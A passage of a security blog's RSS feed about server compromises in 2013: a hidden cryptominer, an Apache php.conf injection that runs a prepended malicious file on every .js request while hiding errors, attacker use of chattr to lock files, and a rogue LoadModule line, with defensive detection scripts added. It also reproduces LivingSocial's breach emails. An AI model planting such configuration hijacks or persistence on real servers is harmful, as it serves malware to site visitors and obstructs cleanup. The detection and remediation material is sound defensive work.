<p>Although the resource usage wasn&#8217;t as intensive in this case, they were still very high. This time top showed that a binary named /mine.16 had been running for days using almost 30% of the CPU for mining purposes. </p>
<p>The attackers seem to leverage services like <strong><em>give-me-ltc.com</em></strong> where everyone can put resources to mine bitcoins/litecoins. When the resources are successful in solving the mathematical problems, everyone receives their share of the pie. Now, we&#8217;re not implying that give-me-ltc.com is malicious by any means, and we have no data to say otherwise. The attackers just seem to be leveraging compromised servers to join the give-me-ltc.com pool of miners.</p>
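<p>An added example, not part of the original post, that picks the two kinds of process shown above out of a <code>ps</code> listing: a daemon name such as mysqld running from a web root or from a relative path, and arguments that look like a mining-pool login, with sustained CPU use over a long elapsed time as a corroborating signal so that a busy legitimate mysqld is not flagged. The sample listing, pool host, path list and thresholds are constructed.</p>

```python
"""Find planted miners in a process listing like the two top(1) lines in the post.
Input lines are constructed to match `ps -eo pid,user,pcpu,etime,args`.
Signals: (1) mining-pool style arguments (--url/--userpass), (2) a daemon name
borrowed to blend in (e.g. "mysqld") running from a web root or a relative path,
(3) sustained high CPU for a long elapsed time, only as corroboration."""
import re

# Heuristic path fragments for "this binary lives where web content lives" (assumed).
WEB_ROOTS = ('/var/www/', '/srv/www/', '/home/', 'wp-content/', 'public_html/')
# Names a miner may borrow to blend in with legitimate daemons (assumed list).
IMPERSONATED = ('mysqld', 'httpd', 'apache2', 'sshd', 'cron')
POOL_ARG_RE = re.compile(r'--(url|userpass|user|pass)(=|\s)', re.IGNORECASE)

SAMPLE_PS = [  # constructed; pool host and paths are placeholders
    'PID USER %CPU ELAPSED ARGS',
    '30104 userx 97.2 3-09:56:23 ./mysqld --url http://pool.example.net:8080',
    '22274 usery 29.1 2-02:04:39 ../mine.16 --url=http://pool.example.net/ --userpass=HIDDEN',
    '1187 mysql 3.4 10-01:02:03 /usr/sbin/mysqld --basedir=/usr',
    '4410 www-data 0.5 05:11 /usr/sbin/apache2 -k start',
    '5120 userx 85.0 00:40 /var/www/site.example/wp-content/plugins/akismet/mysqld',
]


def parse_ps(line):
    """Parse one `ps -eo pid,user,pcpu,etime,args` line; None for the header or junk."""
    parts = line.split(None, 4)
    if len(parts) < 5 or not parts[0].isdigit():
        return None
    pid, user, pcpu, etime, args = parts
    return {'pid': int(pid), 'user': user, 'pcpu': float(pcpu), 'etime': etime, 'args': args}


def etime_to_seconds(etime):
    """Convert ps ELAPSED ([[dd-]hh:]mm:ss) to seconds."""
    days = 0
    if '-' in etime:
        d, etime = etime.split('-', 1)
        days = int(d)
    fields = [int(x) for x in etime.split(':')]
    while len(fields) < 3:
        fields.insert(0, 0)
    h, m, s = fields
    return days * 86400 + h * 3600 + m * 60 + s


def suspicious_reasons(proc, cpu_threshold=25.0, min_age=3600):
    """Return the reasons a process looks like a planted miner (empty list if none)."""
    reasons = []
    exe = proc['args'].split()[0] if proc['args'] else ''
    name = exe.rsplit('/', 1)[-1]
    relative = exe.startswith('./') or exe.startswith('../')
    if POOL_ARG_RE.search(proc['args']):
        reasons.append('mining-pool style arguments')
    if name in IMPERSONATED and any(root in exe for root in WEB_ROOTS):
        reasons.append(f'daemon name {name!r} running from a web root path')
    if name in IMPERSONATED and relative:
        reasons.append(f'daemon name {name!r} started from a relative path')
    # CPU/age only corroborates: a real mysqld can be busy for days too.
    if reasons and proc['pcpu'] >= cpu_threshold and etime_to_seconds(proc['etime']) >= min_age:
        reasons.append(f"sustained {proc['pcpu']}% CPU for {proc['etime']}")
    return reasons


def find_miners(lines):
    """Return [(pid, reasons)] for every process with at least one reason."""
    hits = []
    for line in lines:
        proc = parse_ps(line)
        if proc:
            reasons = suspicious_reasons(proc)
            if reasons:
                hits.append((proc['pid'], reasons))
    return hits


if __name__ == '__main__':
    for pid, reasons in find_miners(SAMPLE_PS):
        print(pid, '; '.join(reasons))
```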
<h4>Using Minerd</h4>
<p>During our analysis, we found that the attackers were using a modified version of minerd to mine Litecoins and Bitcoins. In addition to the miner, every server we worked on also had a PHP based backdoor that gave the attackers full control of the site.</p>
<p>As of the time of this post, it was already being flagged by Avast as: <a href="https://www.virustotal.com/en/file/3ecab64fef787654221834be41db3e161c0b00496a2da64a1c5baaaf970f1bd4/analysis/1366914746/">Win32:Crypt-OSW</a>.</p>
<h4>What&#8217;s the Impact</h4>
<p>Directly to Bitcoin miners and users, none really. For website owners this can be a significant issue. There is a high risk of outages (the host suspends the account for abusing resources) and of monetary loss, and if you&#8217;re a website owner or manager you should take this threat seriously. </p>
<p>What can you do? Nothing we haven&#8217;t evangelized 100 times! Make sure you&#8217;re minimizing risk with the following 5 principles:</p>
<ul>
<li>Update ALL software on the server</li>
<li>Remove all files and software not in use</li>
<li>Limit access to accounts and use proper roles</li>
<li>Strong and unique passwords are key</li>
<li>Institute a backup schedule off site</li>
</ul>
<p>We don&#8217;t really know how widespread this new trend is yet, but when we started to see one server after another with the same issues, we knew something was going on. </p>
<p>Our team will continue to analyze this binary and the growth of this trend, and we will share what we find in follow up posts.</p>
<img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/mfmk7PazkrI" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html</feedburner:origLink></item>
		<item>
		<title>Apache Web Server Attacks Continue to Evolve</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/ADjZUWvyRfk/apache-web-server-attacks-continue-to-evolve.html</link>
		<comments>http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html#comments</comments>
		<pubDate>Mon, 29 Apr 2013 17:21:20 +0000</pubDate>
		<dc:creator>Tony Perez</dc:creator>
				<category><![CDATA[apache]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[malware cleanup]]></category>
		<category><![CDATA[sucuri]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7163</guid>
		<description><![CDATA[For the past few months we have seen a gradual increase in server-level compromises. In fact, every week it seems we&#8217;re handling half a dozen or so and it continues to increase. It&#8217;s one of the reasons that I have started including this as a trend in my most recent Website Security presentations. Just last<a class="more-link" href="http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>For the past few months we have seen a gradual increase in server-level compromises. In fact, every week it seems we&#8217;re handling half a dozen or so and it continues to increase. It&#8217;s one of the reasons that I have started including this as a trend in my most recent Website Security presentations. </p>
<p>Just last week we talked about some very sneaky hacks that <a href="http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html">targeted the Apache binaries</a> directly in the <a href="http://blog.sucuri.net/2013/01/server-side-iframe-injections-via-apache-modules-and-sshd-backdoor.html">place of the modules</a>, contrary to what we had been seeing. Fortunately, the more sophisticated attacks are still few and far between, leaving us to deal with rogue modules more often than not. </p>
<p><a href="http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html/screen-shot-2013-04-27-at-3-39-09-pm" rel="attachment wp-att-7164"><img src="http://blog.sucuri.net/wp-content/uploads/2013/04/Screen-Shot-2013-04-27-at-3.39.09-PM.png" alt="Sucuri - Website Security Trends - Server Compromises" width="855" height="447" class="aligncenter size-full wp-image-7164" /></a></p>
<p><em>The purpose of this image is to provide a logical representation of the evolution of website attacks. While websites are still the number one distribution mechanism, attackers are making a big effort to improve their attacks by going after server level applications in the place of the website itself and its application (i.e., custom ASP/PHP, WordPress, Joomla, etc.). The beauty of this, from their side, is that the attack becomes platform agnostic in terms of the platform the end-user is utilizing.</em><br />
<span id="more-7163"></span><br />
We&#8217;ve provided guidance in the past on how to identify these things on both <a href="http://blog.sucuri.net/2013/01/web-server-attacks-apache-module-log-management-and-relm.html">CentOS / RedHat</a> and <a href="http://blog.sucuri.net/2013/02/web-server-compromise-debian-distro-identify-and-remove-corrupt-apache-modules.html">Debian</a> distros. That guidance still stands, but I do want to add some more information around what the attackers are doing lately to make remediation more of a challenge. </p>
<h3>Two Specific Trends</h3>
<p>We&#8217;ll talk about two specific trends we&#8217;re seeing, in addition to the complex attacks targeting Apache binaries and modules. These are less complex and easier to deploy, but just as dangerous and effective. They also raise concern because to accomplish either the attacker needs administrative privileges, usually root. </p>
<h4>1. Appending Malware to Outgoing Data via Configuration Files</h4>
<p>Found by our Analyst Cosmin Strimbu and Senior Analyst <a href="https://twitter.com/fiocavallari">Fio Cavallari</a></p>
<p>A few months back, February 19th to be exact, I wrote about some <a href="http://blog.sucuri.net/2013/02/sneaky-joomla-web-malware-javascript-infections.html">sneaky JavaScript infections</a> in which <strong>.htaccess</strong> was being used to add, what I like to call, junk in the trunk. But what&#8217;s the obvious downside here?</p>
<p>Well, if the server has many sites on it you have to do it on each one, and how annoying is that. The attackers agree, so they&#8217;ve moved their attack one layer down as well. No need to get fancy with Apache modules either, nah, let&#8217;s just use the configuration files and do the same thing we were doing in .htaccess. Yes, that&#8217;s sarcasm in my tone, and yes, that&#8217;s what they&#8217;re doing. </p>
<p>In a specific instance they modified the configuration file <code>/etc/httpd/conf.d/php.conf</code> and added:</p>
<blockquote><p>
&lt;files ~ "\.js$"&gt;<br />
AddHandler php5-script .js<br />
php_value auto_prepend_file /usr/local/lib/php.lib<br />
php_flag display_errors Off<br />
&lt;/files&gt;
</p></blockquote>
<p>Here it&#8217;s treating every JavaScript file as a PHP script, and <code>auto_prepend_file</code> makes PHP execute /usr/local/lib/php.lib before each of those .js files is served, so the payload ends up in the outgoing response. Then it turns off error display so that any PHP warnings thrown by the injected code don&#8217;t show up and give it away. The next obvious question is, what&#8217;s in that <strong>php.lib</strong>? </p>
<p>Here is what we found in the file: /usr/local/lib/php.lib</p>
<p><a href="http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html/screen-shot-2013-04-27-at-4-28-00-pm" rel="attachment wp-att-7165"><img src="http://blog.sucuri.net/wp-content/uploads/2013/04/Screen-Shot-2013-04-27-at-4.28.00-PM.png" alt="Screen Shot 2013-04-27 at 4.28.00 PM" width="1339" height="273" class="aligncenter size-full wp-image-7165" /></a></p>
<p>This is what Google was blacklisting:</p>
<p><a href="http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html/google-blacklist" rel="attachment wp-att-7166"><img src="http://blog.sucuri.net/wp-content/uploads/2013/04/Google-Blacklist.png" alt="Google Blacklist" width="1170" height="241" class="aligncenter size-full wp-image-7166" /></a></p>
<p>From the code above you can see that the target of this attack was Internet Explorer. If the right user agent was identified, the attacker generated a random subdomain on the <strong>statistic-online</strong> website and sent the user to the malicious payload. Unfortunately we didn&#8217;t pull the payload down in time, so it&#8217;s hard to say exactly what it was attempting. </p>
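<p>A stanza like the one above is easy to miss by eye in a directory full of conf.d files, so here is the check as a script. This is an added example, not code from this post: it reads Apache configuration text and flags AddHandler/AddType lines that route non-PHP extensions through a PHP handler, any <code>auto_prepend_file</code> / <code>auto_append_file</code> setting, and a container that both prepends code and switches <code>display_errors</code> off. The two sample configs are constructed (one reproduces the directives quoted above, the other is a typical stock php.conf for contrast), and the set of extensions that legitimately run through PHP is an assumption to adjust per server.</p>

```python
"""Audit Apache/PHP configuration text for handler hijacks like the php.conf
stanza quoted above. Added example, not code from the Sucuri post. The two
samples are constructed: INJECTED_CONF reproduces the quoted directives, and
STOCK_CONF is a typical php.conf for contrast.
"""
import re

# Extensions that legitimately run through the PHP handler (assumption; adjust per server).
PHP_EXTENSIONS = {".php", ".phtml", ".php5"}

CONTAINER_OPEN = re.compile(
    r"^\s*<(Files|FilesMatch|Directory|DirectoryMatch|Location|LocationMatch)\b[^>]*>\s*$", re.I)
CONTAINER_CLOSE = re.compile(
    r"^\s*</(Files|FilesMatch|Directory|DirectoryMatch|Location|LocationMatch)\s*>\s*$", re.I)
DIRECTIVE = re.compile(
    r"^\s*(AddHandler|AddType|SetHandler|php_value|php_flag|php_admin_value|php_admin_flag)\s+(.+?)\s*$", re.I)


def audit_apache_conf(text, filename="httpd.conf"):
    """Return human-readable findings for one config file's text, in file order."""
    findings = []
    container = None             # the enclosing <Files ...>-style line, if any
    prepend_in_block = False     # auto_prepend/append_file seen in this block
    errors_off_in_block = False  # display_errors forced off in this block

    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        where = f"{filename}:{lineno}"
        if CONTAINER_OPEN.match(line):
            container, prepend_in_block, errors_off_in_block = line, False, False
            continue
        if CONTAINER_CLOSE.match(line):
            if prepend_in_block and errors_off_in_block:
                findings.append(f"{where}: {container} prepends code and hides PHP errors")
            container = None
            continue
        m = DIRECTIVE.match(line)
        if not m:
            continue
        directive, args = m.group(1), m.group(2).split()
        kind = directive.lower()
        ctx = f" in {container}" if container else ""
        if kind in ("addhandler", "addtype") and len(args) >= 2 and "php" in args[0].lower():
            # Handler is PHP: every extension that is not a PHP extension is hijacked.
            hijacked = [e for e in args[1:] if e.lower() not in PHP_EXTENSIONS]
            if hijacked:
                findings.append(f"{where}: {directive} routes {' '.join(hijacked)} through {args[0]}{ctx}")
        elif kind == "sethandler" and args and "php" in args[0].lower() \
                and container and "php" not in container.lower():
            findings.append(f"{where}: SetHandler {args[0]} applied to non-PHP files{ctx}")
        elif kind in ("php_value", "php_admin_value") and len(args) >= 2 \
                and args[0].lower() in ("auto_prepend_file", "auto_append_file"):
            prepend_in_block = True
            findings.append(f"{where}: {args[0]} = {args[1]}{ctx} (inspect that file)")
        elif kind in ("php_flag", "php_admin_flag") and len(args) >= 2 \
                and args[0].lower() == "display_errors" and args[1].lower() in ("off", "0"):
            errors_off_in_block = True
    return findings


STOCK_CONF = r"""
# constructed: what a stock php.conf stanza looks like
<FilesMatch \.php$>
    SetHandler application/x-httpd-php
</FilesMatch>
AddHandler php5-script .php
AddType text/html .php
DirectoryIndex index.php
"""

INJECTED_CONF = r"""
# constructed around the stanza quoted in the post
<files ~ "\.js$">
AddHandler php5-script .js
php_value auto_prepend_file /usr/local/lib/php.lib
php_flag display_errors Off
</files>
"""

if __name__ == "__main__":
    for finding in audit_apache_conf(INJECTED_CONF, "/etc/httpd/conf.d/php.conf"):
        print(finding)
```

<p>Run it over every file Apache reads, not only httpd.conf (on CentOS that means all of /etc/httpd/conf.d), and remember that the same directives are just as effective in a per-directory .htaccess, which is where the earlier variant of this trick lived.</p>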
<h4>2. Disabling Root Changes on Infected Files</h4>
<p>Yes, there is a way to take away the administrator&#8217;s ability to modify files, any file, on your server. It&#8217;s known as making a file immutable, and you accomplish it by changing the file&#8217;s attributes with the <strong>chattr</strong> command. The command is similar in spirit to the <strong>attrib</strong> command on DOS and Microsoft Windows. </p>
<p>A good sign that you might be dealing with this is if you&#8217;re logged into your server as root, or as a user with administrator permissions, and when you try to edit a file in vim you see:</p>
<blockquote><p>
W10: Warning: Changing a read-only file
</p></blockquote>
<p>Or if you try to save and you see:</p>
<blockquote><p>
&#8220;/etc/httpd/conf.d/ssl.conf&#8221; E212: Can&#8217;t open file for writing
</p></blockquote>
<p>This is a good time to use <strong>lsattr</strong>, which lists the extended file attributes that a plain <strong>ls</strong> doesn&#8217;t show:</p>
<blockquote><p>
# lsattr filename</p>
<p>- in my example it&#8217;d be </p>
<p># lsattr /etc/httpd/conf.d/ssl.conf
</p></blockquote>
<p>You&#8217;re likely to see something like this:</p>
<blockquote><p>
----ia------- /etc/httpd/conf.d/ssl.conf
</p></blockquote>
<p>The <strong>i</strong> and <strong>a</strong> attributes each mean something different. <strong>i</strong> makes the file immutable, so nobody can modify, delete, rename or hard-link it, while <strong>a</strong> makes it append-only: data can be added to the end, but existing content can&#8217;t be changed. Note that only root (strictly, a process with the CAP_LINUX_IMMUTABLE capability) can set or clear these attributes, so finding them on a file you never locked yourself is a strong sign that the server has been compromised at the root level. </p>
<p>Regardless, if this is the case, you can, thankfully, remove the restriction by doing:</p>
<blockquote><p>
# chattr -ia /etc/httpd/conf.d/ssl.conf
</p></blockquote>
<p>In this case the <strong>-</strong> will remove the restriction while the <strong>+</strong> will add it. Once that is done you should see this:</p>
<blockquote><p>
# lsattr /etc/httpd/conf.d/ssl.conf<br />
------------- /etc/httpd/conf.d/ssl.conf
</p></blockquote>
<p>Now you&#8217;re back in business and removing things like this:</p>
<blockquote><p>
LoadModule uni_config_module modules/mod/mod_uni_config.so
</p></blockquote>
<p>I can&#8217;t remember the last time we found the rogue <strong>LoadModule</strong> call in <strong>httpd.conf</strong> itself; the attackers load their module from one of the other configuration files instead, so crawl through everything in /etc/httpd/conf.d, since all of it is loaded when Apache starts. A quick and easy way to do this:</p>
<blockquote><p>
# grep -ri "LoadModule" /etc/
</p></blockquote>
<p>I&#8217;d start in your /etc/ directory, it&#8217;s the default location for most distros, but in some instances you might need to look elsewhere, just depends on your distribution and configuration.</p>
<p>Don&#8217;t forget to remove the module as well, not just the LoadModule call:</p>
<blockquote><p>
# rm -rf /etc/httpd/modules/mod_uni_config.so
</p></blockquote>
<p>Then set the immutable attribute yourself on your configuration files so that automated attacks can&#8217;t simply rewrite them, but leave the append-only attribute off. Keep in mind that an attacker with root can clear the flag exactly the way you just did, so this slows down scripted tampering; it is not a substitute for closing the hole they came in through. </p>
<blockquote><p>
# chattr +i /etc/httpd/conf.d/ssl.conf
</p></blockquote>
<p>Do remember that both these changes were made as a user with administrative privileges. This means that removing or reverting them is just half the battle. If you cannot definitively identify the vector, it might be time to reimage the box or migrate to a new one. It will not do you much good to remove the module but leave everything else in place; they&#8217;ll likely regain access. The first thing I&#8217;d recommend is purging all accounts that have access. I&#8217;d then make sure I&#8217;m no longer using passwords to authenticate (key-based SSH instead) and start adding a few layers of defense.</p>
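<p>The steps above (lsattr to find locked files, chattr to unlock them, grep for LoadModule across the configuration tree) as one script. This is an added example, not code from this post: it works from captured <code>lsattr -R</code> output and configuration file text so that it runs offline and can be reviewed before anything is changed. The sample lsattr output, the sample conf.d file and the <code>BASELINE_MODULES</code> set are constructed (the ssl.conf and mod_uni_config.so names come from the post); build your own baseline from a clean install or the package manifest.</p>

```python
"""Find immutable/append-only files and LoadModule directives in an Apache
configuration tree, from captured `lsattr -R` output and config file text.
Added example, not code from the Sucuri post; the samples are constructed
around the ssl.conf / mod_uni_config.so case the post describes.
"""
import re

LSATTR_LINE = re.compile(r"^([-A-Za-z]+)\s+(\S.*)$")
LOADMODULE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.I)

# Modules a stock httpd build on this box ships with (assumption; generate
# yours from a clean install or the package manifest).
BASELINE_MODULES = {"mod_ssl.so", "mod_rewrite.so", "mod_php5.so"}


def parse_lsattr(output):
    """Yield (path, set_of_flag_letters) from `lsattr -R` output."""
    for line in output.splitlines():
        m = LSATTR_LINE.match(line.strip())
        if not m:
            continue  # directory headers, blank lines, lsattr error messages
        flags, path = m.groups()
        yield path, {c for c in flags if c != "-"}


def locked_files(lsattr_output):
    """Paths carrying the immutable (i) or append-only (a) attribute, each
    with the exact chattr command that clears what is set."""
    out = []
    for path, flags in parse_lsattr(lsattr_output):
        locked = "".join(f for f in "ia" if f in flags)
        if locked:
            out.append((path, locked, f"chattr -{locked} {path}"))
    return out


def load_modules(conf_text, filename):
    """Every LoadModule directive in one file, marking unknown .so names."""
    found = []
    for n, line in enumerate(conf_text.splitlines(), 1):
        m = LOADMODULE.match(line)
        if m:
            name, so_path = m.groups()
            so_file = so_path.rsplit("/", 1)[-1]
            found.append({"file": filename, "line": n, "module": name,
                          "path": so_path, "known": so_file in BASELINE_MODULES})
    return found


def remediation_plan(lsattr_output, conf_files):
    """Ordered list of things to do by hand: unlock files first (nothing can
    be edited before that), then review every module not in the baseline."""
    steps = [cmd for _, _, cmd in locked_files(lsattr_output)]
    for filename, text in conf_files.items():
        for m in load_modules(text, filename):
            if not m["known"]:
                steps.append(f"# review {m['file']}:{m['line']} LoadModule {m['module']} {m['path']}")
    return steps


# Constructed sample of `lsattr -R /etc/httpd/conf.d` output.
SAMPLE_LSATTR = """\
/etc/httpd/conf.d:
----ia------- /etc/httpd/conf.d/ssl.conf
------------- /etc/httpd/conf.d/php.conf
----i-------- /etc/httpd/conf.d/welcome.conf
lsattr: Operation not supported While reading flags on /etc/httpd/conf.d/.sock
"""

# Constructed conf.d file carrying the rogue LoadModule quoted in the post.
SAMPLE_CONF = """\
# ssl.conf as found on the box
LoadModule ssl_module modules/mod_ssl.so
LoadModule uni_config_module modules/mod/mod_uni_config.so
"""

if __name__ == "__main__":
    for step in remediation_plan(SAMPLE_LSATTR, {"/etc/httpd/conf.d/ssl.conf": SAMPLE_CONF}):
        print(step)
```

<p>Capture the input with <code>lsattr -R /etc/httpd /usr/local/apache 2&gt;/dev/null</code> on the box itself. A file you locked deliberately shows up in the plan too (welcome.conf above carries only <code>i</code>), which is the point: the list is for a human to read before running anything.</p>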
<h3>What Does This Tell Us?</h3>
<p>We&#8217;re in for a treat. I&#8217;m most concerned about the attacks on the Apache binaries, as they are so difficult to detect and fix, and they tell us we&#8217;re in for some interesting times. We know that websites are high value targets for attackers and that they account for 90% of the malware unknown to traditional AVs. One trend common to all these attacks is that they&#8217;re being used to distribute payloads created by the <a href="http://nakedsecurity.sophos.com/2012/03/29/exploring-the-blackhole-exploit-kit/">BlackHole Exploit Kit</a>. This shows a level of sophistication in that segment of attackers that we are not seeing with other groups. </p>
<img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/ADjZUWvyRfk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html</feedburner:origLink></item>
		<item>
		<title>LivingSocial Hacked — More Than 50 Million Accounts Compromised</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/bFLMUNIsprk/livingsocial-hacked-more-than-50-million-accounts-compromised.html</link>
		<comments>http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html#comments</comments>
		<pubDate>Fri, 26 Apr 2013 21:36:36 +0000</pubDate>
		<dc:creator>Tony Perez</dc:creator>
				<category><![CDATA[awareness]]></category>
		<category><![CDATA[hacked]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7139</guid>
		<description><![CDATA[Just as we were thinking we were going to avoid any major enterprise compromises this week, LivingSocial announces that it has been compromised and some 50 million accounts have been compromised. Based on the reports, it doesn&#8217;t seem that any financial data is at risk, but things like usernames and passwords are all fair game.<a class="more-link" href="http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>Just as we were thinking we were going to avoid any major enterprise compromises this week, <a href="https://livingsocial.com">LivingSocial</a> announces that it has been compromised and some <a href="http://allthingsd.com/20130426/livingsocial-hacked-more-than-50-million-customer-names-emails-birthdates-and-encrypted-passwords-accessed/?mod=fb">50 million accounts have been compromised</a>. Based on the reports, it doesn&#8217;t seem that any financial data is at risk, but things like usernames and passwords are all fair game. </p>
<p>To put this into perspective, think back to last year&#8217;s major compromise, <a href="http://blog.sucuri.net/2012/06/linkedin-password-dump-verified.html">LinkedIn</a>: that was only 6 million accounts. The data compromised here is more than eight times that size. </p>
<p>That&#8217;s pretty freaking big.<br />
<span id="more-7139"></span></p>
<h4>Email to Clients</h4>
<blockquote><p>
Subject: An important update on your LivingSocial.com account</p>
<p>LivingSocial recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.<br />
The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.</p>
<p>The database that stores customer credit card information was not affected or accessed.</p>
<p>Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one.<br />
For your security, please create a new password for your < > account by following the instructions below.</p>
<p>1. Visit LivingSocial.com<br />
2. Click on the “Create a New Password” button (top right corner of the homepage)<br />
3. Follow the steps to finish</p>
<p>We also encourage you, for your own personal data security, to consider changing password(s) on any other sites on which you use the same or similar password(s).</p>
<p>The security of your information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.</p>
<p>Please note that LivingSocial will never ask you directly for personal or account information in an email. We will always direct you to the LivingSocial website — and require you to login — before making any changes to your account. </p>
<p>Please disregard any emails claiming to be from LivingSocial that request such information or direct you to a different website that asks for such information.</p>
<p>If you have additional questions about this process, the “Create a New Password” button on LivingSocial.com will direct you to a page that has instructions on creating a new password and answers to frequently asked questions.</p>
<p>We are sorry this incident occurred, and we look forward to continuing to introduce you to new and exciting things to do in your community.</p>
<p>Tim O’Shaughnessy<br />
CEO, LivingSocial
</p></blockquote>
<h4>Email to Employees</h4>
<blockquote><p>
Re: Security Incident<br />
LivingSocialites –</p>
<p>This e-mail is important, so please read it to the end.</p>
<p>We recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.<br />
The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.<br />
Two things you should know:</p>
<p>1. * The database that stores customer credit card information was not affected or accessed.<br />
2. * The database that stores merchants’ financial and banking information was not affected or accessed.</p>
<p>The security of our customer and merchant information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.</p>
<p>To ensure our customers and merchants are fully informed and protected, we are notifying those who may have been impacted via email explaining what happened, expiring their passwords, and requesting that they create new passwords. A copy of the note is included below this email.</p>
<p>If you have any questions or concerns, please visit Pulse &#8211; https://pulse.livingsocial.com/intranet/Home/more_updates.html &#8211; for a list of frequently asked questions. If you have additional questions that aren’t answered in the FAQs, please submit them via email to XXX@livingsocial.com.</p>
<p>Because we anticipate a high call volume and may not be able to answer or return all calls in a responsible fashion, we are likely to temporarily suspend consumer phone-based servicing. We will be devoting all available resources to our web-based servicing.</p>
<p>I apologize for the formality of this note, which the circumstances demand. We need to do the right thing for our customers who place their trust in us, and that is why we’re taking the steps described and going above and beyond what’s required. We’ll all need to work incredibly hard over the coming days and weeks to validate that faith and trust.</p>
<p>– Tim
</p></blockquote>
<h3>What&#8217;s this mean to you?</h3>
<p>Well, it means that attackers, if they manage to crack the password hashes, are bound to have one of the largest username / password lists out there. What makes it worse is that they have username, email, birthday and password combinations. For any attacker looking for a specific target, or for anyone looking to perform large scale attacks like the <a href="http://blog.sucuri.net/2013/04/the-wordpress-brute-force-attack-timeline.html">recent Brute Force attacks against WordPress sites</a>, this is a gold mine. </p>
<p>This also makes it really easy to attack things like Facebook, Twitter, MySpace, Flickr, etc.. ever hear of those companies? </p>
<p>If you&#8217;re not already, here are a few things you really should be doing:</p>
<ul>
<li>Don&#8217;t use the same password on multiple sites</li>
<li>Rotate usernames and emails on each site</li>
<li>Try platform specific emails &#8211; (e.g., perezbox-livingsocial@gmail.com)</li>
</ul>
<p>First, no I don&#8217;t have a LivingSocial account, at least I don&#8217;t think I do.</p>
<p>Second, yes it&#8217;s annoying, but what&#8217;s the real impact if you use the same information across all your social media and financial institutions? I bet those 50 million people are thinking it&#8217;s a small price to pay right now. </p>
<p>Third, always employ good passwords. By good I mean: unique, random and long. At least that&#8217;s my preference. Can&#8217;t remember them? No problem, try things like password managers: <a href="https://agilebits.com/onepassword">1Password</a> and <a href="https://lastpass.com/">LastPass</a> are my recommendations. </p>
<p>Lastly, if you haven&#8217;t already, update your LivingSocial password at a minimum, and I would encourage you to go through all your online properties and update those accounts as well. Especially if you like to use the same information on all of them, you know who you are.</p>
<p>Cheers. </p>
<img src="http://feeds.feedburner.com/~r/SucuriSecurity/~4/bFLMUNIsprk" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html/feed</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html</feedburner:origLink></item>
		<item>
		<title>Apache Binary Backdoors on Cpanel-based servers</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/nK9BOpbeocA/apache-binary-backdoors-on-cpanel-based-servers.html</link>
		<comments>http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html#comments</comments>
		<pubDate>Fri, 26 Apr 2013 14:47:17 +0000</pubDate>
		<dc:creator>Daniel Cid</dc:creator>
				<category><![CDATA[apache]]></category>
		<category><![CDATA[hacked]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[malware_updates]]></category>
		<category><![CDATA[backdoor]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7057</guid>
		<description><![CDATA[For the last few months we have been tracking server level compromises that have been utilizing malicious Apache modules (Darkleech) to inject malware into websites. Some of our previous coverage is available here and here. However, during the last few months we started to see a change on how the injections were being done. On<a class="more-link" href="http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
